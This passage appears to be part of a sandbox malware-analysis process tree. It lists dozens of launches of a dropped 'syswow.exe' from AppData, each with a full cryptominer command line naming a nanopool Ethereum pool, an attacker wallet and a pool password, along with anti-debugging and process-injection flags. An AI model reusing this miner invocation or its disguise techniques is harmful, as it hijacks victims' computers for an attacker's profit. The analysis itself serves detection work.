                                                                                                                                                                                                                                                                        PID:1708
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5020
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5504
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:1592
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:4920
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:3556
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5784
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:2128
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5928
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5304
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:4424
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:4984
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5036
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:4932
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5264
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                        PID:4872
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:1164
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:4456
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5376
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:860
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5952
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5100
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:4284
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:6000
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:4788
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:5516
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:5344
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:416
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:4656
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:4864
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:3928
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:4944
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:5424
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:5544
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:6100
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:3816
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:4684
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:4312
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:5972
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:5152
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:5784
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:2856
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:5056
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:4344
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:5560
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:5228
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:5492
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
